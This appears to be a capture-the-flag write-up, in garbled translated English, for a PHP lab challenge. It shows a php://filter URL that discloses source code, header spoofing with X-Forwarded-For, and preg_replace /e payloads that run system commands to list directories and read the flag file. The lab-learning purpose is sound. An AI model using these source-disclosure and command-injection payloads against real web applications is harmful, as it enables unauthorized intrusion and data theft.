Author: admin
[Principle]
file that contains the source code to read, x-forwarded-for
When the preg_replace perform a regular expression search and replace, preg_replce regular expression section contains parameters e, part replacement can be performed.
[Objective]
mastered regular expressions, pseudo-protocol read source code
[Environment]
Windows
[Tools]
Firefox, Burp
[Procedure]
1. Access equipment maintenance center cloud internet page, read the source code using a pseudo-protocol php.
http://111.198.29.45:44740/index.php?page=php://filter/convert.base64-encode/resource=index.php
2. The source code obtained base64-decryption processing, the acquired source index.php, line 121 can be found in the back door, as shown in FIG.
3. this section of code audit can be found to need to be X_FORWARDED_FOR 127.0.0.1, and get transferred by way of three parameters passed to the preg_replace.
Here are about preg_replace function:
PHP is actually in regular expressions, is where the match I need to write a blog on a regular individual. Wait for it .... follow
4. burp http request header parameter modification, adding X_FORWARDED_FOR, to the url
/index.php?pat=/(.*)/e&rep=system('ls')&sub=aa can view the list of files, as shown.
5. The url to /index.php?pat=/(.*)/e&rep=system('ls+s3chahahaDir')&sub=aa view s3chahahaDir folder, find the folder flag.
6. url to /index.php?pat=/(.*)/e&rep=system('ls+s3chahahaDir/flag')&sub=aa view flag folder, find flag.php file.
7. The url to /index.php?pat=/(.*)/e&rep=system('cat+s3chahahaDir/flag/flag.php')&sub=aa view flag, as shown in FIG.
